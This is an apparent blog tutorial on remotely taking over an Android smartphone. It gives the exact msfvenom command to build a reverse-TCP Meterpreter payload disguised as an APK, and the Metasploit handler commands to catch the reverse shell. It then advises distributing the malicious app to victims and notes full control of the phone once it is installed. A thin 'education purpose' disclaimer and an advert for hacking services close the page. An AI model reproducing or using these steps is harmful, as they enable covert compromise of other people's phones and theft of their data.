Hacking Android Smartphone using Metasploit Kali Linux (Remotely)

Hacking Android Smartphone using Metasploit Kali Linux (Remotely)
In world all are used smartphone.
Why We Use kali?
Android is an operating system based on the Linux kernel, and designed primarily for touch screen mobile devices such as smartphones and tablet computers.

Let’s Start Our Tutorial

Requirements:

  1. Install Kali Linux(If u not install click on this link )
  2. Metasploit framework
  3. Android smartphone (you use any smartPhone with latest android Version)
Here is some important information for this tutorial:

Attacker IP address: 192.168.1.5( here you use your ip Address)

Attacker port to receive connection: 4444

Step by Step Hacking Android Smartphone using Metasploit: –

There are many tutorials on internet for android hacking by using Metasploit. But metasploit change their commands MSFVenom Replace msfpayload

  1. To open terminal use Shortcut key (CTRL + ALT + T) from key board.
  2. Then  type this command  in terminal..

 msfvenom -p android/meterpreter/reverse_tcp LHOST= 192.168.1.5 LPORT=4444 R >/root/any nameof yourfile.apk

  • -p => Specify Payload
    • LHOST => Your IP* or DDNS
  • LPORT => Port You want to listen on
  • R => Means RAW Format
  • >/root/FILENAME.apk => Location for File
below is our screenshot when executed the command
1
3.Now Anroid App Ready to Attack.then Type msfconsole to go to Metasploit console.
2
Type Payload same with step2:

use exploit/multi/handler –> we will use Metasploit handler set payload android/meterpreter/reverse_tcp –> make sure the payload

4. The next step we need to configure the switch for the Metasploit payload we already specified in step 3.

set lhost 192.168.1.5 –> attacker IP address
set lport 4444 –> port to listen the reverse connection
exploit –> start to listen incoming connection

3
  • Upload Your Payload file for distribution
  • the victim (me myself) download the malicious APK’s file and install it. After victim open the application, attacker.
  • It’s mean that attacker already inside the victim android smartphone and he can do everything with victim phone. –
4

Only Education Purpose*

We Provide Services On Following Cities

*Ethical Haker in Ludhiana *Ethical Hacking Services in Amritsar *Ethical Hacking Services in Mumbai
*Ethical Hacking Services in Delhi *Ethical Hacking Services in Gujarat * Ethical Hacking Services in Chandigarh

Leave a Reply

Your email address will not be published. Required fields are marked *